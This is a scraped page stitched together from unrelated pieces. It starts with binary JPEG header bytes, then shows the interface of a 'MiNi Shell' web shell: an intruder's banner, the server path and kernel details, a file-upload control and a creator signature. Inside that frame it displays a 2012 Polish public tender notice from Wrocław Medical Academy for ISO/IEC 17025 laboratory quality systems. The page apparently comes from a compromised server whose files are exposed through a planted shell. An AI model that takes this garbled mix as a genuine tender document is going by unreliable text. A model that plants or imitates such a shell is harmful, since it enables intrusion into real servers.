JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/239064-N-2012.html

<p class="kh_header"><b>Wrocław: Przetarg nieograniczony Nr AM / AZ / PN - 67 / 12 na: Opracowanie i wdrożenie systemu zarządzania jakością wg ISO/IEC 17025:2005 ,Ogólne wymagania dotyczące kompetencji laboratoriów badawczych i wzorcujących, w 5 laboratoriach Akademii Medycznej we Wrocławiu</b><br>
<b>Numer ogłoszenia: 239064 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony Nr AM / AZ / PN - 67 / 12 na: Opracowanie i wdrożenie systemu zarządzania jakością wg ISO/IEC 17025:2005 ,Ogólne wymagania dotyczące kompetencji laboratoriów badawczych i wzorcujących, w 5 laboratoriach Akademii Medycznej we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Opracowanie i wdrożenie systemu zarządzania jakością wg ISO/IEC 17025:2005, Ogólne wymagania dotyczące kompetencji laboratoriów badawczych i wzorcujących, w następujących laboratoriach Akademii Medycznej we Wrocławiu:
1) Nazwa laboratorium: Laboratorium Zakładu Technik Molekularnych Katedry Medycyny Sądowej
Zwięzły opis laboratorium: Laboratorium Zakładu Technik Molekularnych, Katedry Medycyny Sądowej, Akademii Medycznej im. Piastów Śląskich we Wrocławiu posiada następujące pracownie: Pracownia Badania Dowodów Rzeczowych,
Pracownia Ustalania Ojcostwa, Pracownia Technik Molekularnych i Diagnostyki Klinicznej, Pracownia Medycyny Komórkowej. Laboratorium zlokalizowane jest w trzech budynkach: Zakładu Technik Molekularnych przy ul. M. Skłodowskiej-Curie 52, ul. Chałubińskiego 2a oraz Katedry i Zakładu Medycyny Sądowej przy ul. Mikulicza -Radeckiego 4. W laboratorium wykorzystuje się testy komercyjne oraz powszechnie uznane metody biologii molekularnej. Wyposażenie laboratorium jest ponadstandardowe.
Zakres działalności laboratorium: W Pracowni Badania Dowodów Rzeczowych i Pracowni Ustalania Ojcostwa wykonuje się badania na zlecenia sądów, prokuratur oraz osób prywatnych (za zgodą opiekunów prawnych dziecka). Zakres pracy obejmuje przyjmowanie i pobieranie materiału biologicznego do badań, zabezpieczanie materiału, oględziny, badania wstępne, identyfikacyjne, sporządzanie i wydawanie opinii i/lub wyników badań.
W Pracowni Technik Molekularnych i Diagnostyki Klinicznej wykonywane są badania z zakresu genetyki molekularnej, typowania molekularnego do diagnostyki chorób oraz molekularnej diagnostyki mikrobiologicznej. 
Pracownia Medycyny Komórkowej zajmuje się hodowlą komórek na podłożach stałych i płynnych, izolacją materiału genetycznego, testami migracji komórek, analizą subkomórkową lokalizacji białek oraz analizą ekspresji białek.
 Liczba pracowników laboratorium: 10

2) Nazwa laboratorium: Laboratorium Zakładu Patomorfologii i Cytologii Onkologicznej, zlokalizowane przy ul. Borowskiej 213.
Zwięzły opis laboratorium: Laboratorium Zakładu swoje działanie rozpoczęło w marcu 2011 roku świadcząc usługi z zakresu patomorfologii dla Akademickiego Szpitala Klinicznego im. Mikulicza-Radeckiego we Wrocławiu. W Laboratorium Zakładu znajdują się pracownie: Histopatologiczna, Cytologiczna, Immunohistochemiczna, Biologii molekularnej, Prosektorium. Dodatkowo prowadzi badania naukowe z zakresu biologii molekularnej oraz patomorfologii. Ponadto odbywają się w nim studia doktoranckie oraz szkolenie specjalistów z zakresu patomorfologii. 
Zakres działalności laboratorium: Zakres działalności Zakładu obejmuje wszystkie działy patomorfologii tzn. histopatologię, cytologię, immunohistochemię, biologię molekularną oraz sekcje zwłok. 
Liczba pracowników laboratorium: 21

3) Nazwa laboratorium: Laboratorium Badań Molekularnych Katedry i Zakładu Genetyki, zlokalizowane przy ul. Marcinkowskiego 1.
Zwięzły opis laboratorium: Katedra i Zakład Genetyki posiada w swojej strukturze dwa laboratoria: Laboratorium Badań Cytogenetycznych i Laboratorium Badań Molekularnych. Laboratorium Badań Cytogenetycznych zajmuje się wykonaniem badań postnatalnych i prenatalnych. Materiałem do ww. badań jest płyn owodniowy i krew pępowinowa (badania prenatalne) oraz krew obwodowa, fibroblasty skóry, fragmenty tkanek, guzy (badania postnatalne). 
Zakres działalności laboratorium: Laboratorium Badań Molekularnych zajmuje się badaniem DNA lub RNA uzyskanymi z krwi obwodowej, fragmentów różnych tkanek.
Liczba pracowników laboratorium: 14 

4) Nazwa laboratorium: Laboratorium Naukowe Kliniki Transplantacji Szpiku, Onkologii i Hematologii Dziecięcej, zlokalizowane przy ul. Bujwida 44.
Zwięzły opis laboratorium: Laboratorium Naukowe składa się z dwóch pracowni: Cytometrii Przepływowej  i Preparatyki Komórkowej (pięcioparametryczny cytofluorymetr przepływowy, komora laminarna i inkubatory CO2 do prowadzenia hodowli komórkowych) oraz Biologii Molekularnej (pełny zestaw sprzętu do biologii molekularnej). 
Zakres działalności laboratorium: 
Laboratorium zajmuje się analizą cytometryczną antygenów powierzchniowych i cytoplazmatycznych w krwi obwodowej i w szpiku, preparatyką komórkową obejmującą hodowle komórkowe, jakościowymi i ilościowymi badaniami wykorzystującymi technikę PCR.
Liczba pracowników laboratorium: 3 

5) Nazwa laboratorium: Laboratorium specjalistyczne Katedry i Kliniki Nefrologii i Medycyny Transplantacyjnej, zlokalizowane przy ul. Borowskiej 213.
Zwięzły opis laboratorium: Laboratorium wykonuje działalność naukowo-badawczą w zakresie immunologii i nefrologii. Prowadzi też działalność w zakresie specjalistycznej diagnostyki.
Zakres działalności laboratorium: 
Laboratorium wykonuje działalność naukowo-badawczą w zakresie immunologii i nefrologii:
-	przeciwciała anty-HLA i non-HLA, flow-CDC, HLA-DR/monocyty w monitorowaniu
alloreaktywności humoralnej biorców przeszczepu nerki
-	obecność komórek alloreaktywnych u biorcy przeszczepu nerki -technika ELISPOT
-	fenotypowanie komórek układu odpornościowego (T, B, NK, naturalne Treg, komórki cytotoksyczne)
-	pomiary stężeń cytokin, czynników wzrostowych, biomarkerów uszkodzenia tkanki nerkowej, etc z wykorzystaniem techniki ELISA
-	określanie poziomu ekspresji wybranych genów w pełnej krwi, izolowanych komórkach krwi oraz bioptatach nerkowych
-	badanie polimorfizmów genowych z wykorzystaniem SSP-PCR i RFLP
Laboratorium prowadzi też działalność w zakresie specjalistycznej diagnostyki:
-	aktywność hemolityczna dopełniacza,
-	antygen wczesny CMV
-	obecność przeciwciał anty-HLA, anty-PLA2R
Liczba pracowników laboratorium: 4 

Szczegółowy zakres prac Wykonawcy, których efektem ma być przygotowanie i wdrożenie systemu jakości:
1)	Audit diagnostyczny (wstępny) obejmujący zbadanie występujących zgodności z wymaganiami wdrażanych norm w istniejącym systemie zarządzania laboratoriami oraz wymaganiami wdrażanych norm w istniejącym systemie zarządzania jakością.
2)	Szkolenie podstawowe personelu oraz opracowanie dokumentacji systemowej, a w szczególności: 
a.  Przeprowadzenie szkolenia Budowa i utrzymanie systemu zarządzania jakością w laboratorium zgodnego z PN-EN ISO/IEC 17025:2005  tematyka: (wymagania PN-EN ISO/IEC 17025:2005; normy związane; podstawowe określenia i definicje) 

b. Opracowanie dokumentacji systemu zarządzania jakością w laboratorium
i.         Projekty procedur
ii.        Projekty instrukcji
iii.       Wzory formularzy
iv.       Projekt Polityki Jakości Laboratorium
v.        Projekt Księgi Jakości Laboratorium 
c.  Opracowanie kompletnej dokumentacji systemowej w pełni spełniającej wymagania stawiane przez normę ISO/IEC 17025:2005 i dodatkowo pozostającej w zgodzie ze szczegółowymi przepisami
dotyczącymi struktury i profilu konkretnego laboratorium (jeżeli te przepisy istnieją)
3)	Konsultacje dokumentacji oraz kontrola jakości badań a w szczególności prowadzenie konsultacji z personelem i kadrą kierowniczą w zakresie opracowania dokumentacji systemowej, zebranie uwag, wyjaśnienie niejasności, weryfikacja dokumentów wprowadzanych do praktycznego funkcjonowania oraz przeprowadzenie spotkania szkoleniowo-konsultacyjnego Kontrola jakości badań.
4)	Walidacja metod oraz szkolenie audytorów wewnętrznych dla laboratorium obejmujące przeprowadzenie spotkania szkoleniowo-konsultacyjnego Walidacja metod, konsultacje w zakresie przygotowania stosowanych w laboratorium metod do walidacji, przeprowadzenie szkolenia wytypowanych audytorów wewnętrznych (tematyka : Audit wewnętrzny w laboratorium badawczym; prezentacja normy ISO/IEC 17025, przygotowanie, przebieg i dokumentowanie auditów; działania pozauditowe; ćwiczenia praktyczne).
5)	Nadzór nad wdrożeniem obejmujący prowadzenie konsultacji wdrożeniowych (audity cząstkowe elementów systemu zarządzania jakością w laboratorium, programowania działań korygujących wynikających z poczynionego rozpoznania, zapoznanie z podstawowymi kryteriami i zasadami procesu akredytacji oraz przygotowanie wniosku o akredytację do Polskiego Centrum Akredytacji).
6)	Monitorowanie systemu zarządzania jakością w laboratorium obejmujące przygotowanie i przeprowadzenie auditu wewnętrznego sprawdzającego wdrożenie systemu w zakresie wszystkich elementów stworzonego systemu zarządzania jakością laboratorium, zaprogramowanie działań korygujących oraz organizacja przeglądu zarządzania wraz z opracowaniem protokołu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.20.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy dotyczące spełniania przez niego warunków określonych w art. 22 ust. 1 Pzp. Ocena spełniania tego warunku na zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług - min. 3 usługi opracowania i wdrożenia systemu zarządzania jakością w laboratoriach - o wartości brutto min. 15.000,00 PLN każda, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, dat wykonania i odbiorców wraz z załączonym dokumentem potwierdzającym, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy dotyczące spełniania przez niego warunków określonych w art. 22 ust. 1 Pzp. Ocena spełniania tego warunku na zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy dotyczące spełniania przez niego warunków określonych w art. 22 ust. 1 Pzp. Ocena spełniania tego warunku na zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy dotyczące spełniania przez niego warunków określonych w art. 22 ust. 1 Pzp. Ocena spełniania tego warunku na zasadzie: spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz Ofertowy - załącznik nr 1 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadku:
a)	ustawowej wysokości stawki podatku VAT:
Zamawiający wyraża zgodę na zmianę cen brutto w trakcie realizacji umowy, w przypadku ustawowej zmiany wysokości stawki podatku VAT dla zamawianej usługi. W przypadku zmiany wysokości stawki podatku VAT dla zamawianej usługi, Zamawiający zapłaci Wykonawcy cenę netto plus obowiązująca stawka podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych AM ul. Mikulicza-Radeckiego 5 50-368 Wrocław pokój 221 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2012 godzina 09:00, miejsce: Zespół ds. Zamówień Publicznych AM ul. Mikulicza-Radeckiego 5 50-368 Wrocław pokój 221 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com